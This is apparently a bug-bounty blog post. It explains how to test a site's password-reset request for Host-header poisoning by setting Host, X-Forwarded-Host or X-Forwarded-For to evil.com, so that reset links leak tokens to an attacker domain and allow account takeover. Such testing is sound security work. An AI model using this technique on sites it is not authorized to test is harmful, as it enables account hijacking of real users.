How to find an easy P2

Hi everyone,

This post is about low effort P2 bug, this bug is not common and its severity is high but finding it is a piece of cake and only takes less than 5 minutes

here is a step by step procedure:

  1. lets say we have target example.com
  2. go to password reset feature and request password reset and intercept request
  3. lets say HTTP request looks like this(i have redacted all the gibberish cookies, and target name)

POST /api/reset-password/submit-email HTTP/1.1
Host: www.example.ca
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.ca/reset-password
Content-Type: application/json
X-CSRF-Token: [Redacted]
Origin: https://www.example.ca
Content-Length: 42
Connection: close
Cookie: ck_cabf=[Redacted]; ck_pcid=[Redacted]; _ga=[Redacted]; __utma=[Redacted]; __utmz=; ck_crumb=[Redacted]; utag_main=[Redacted]; _gid=[Redacted]; _gat=1
{"emailAddress":"[Redacted]"}

4.there are 3 steps that you can try to check cache poisoning

(i) edit the host to Host: evil.com

(ii)leave the host and in the line below host add X-Forwarded-Host: evil.com

(iii)if (ii) doesnt work then use X-Forwarded-For: evil.com

5. if it is vulnerable you will get the mail to your registered mail address,and when you will open the mail you will be redirected to something like https://evil.com/yourResetToken which means now the evil domain has your token and it will cause account takeover

hope you liked this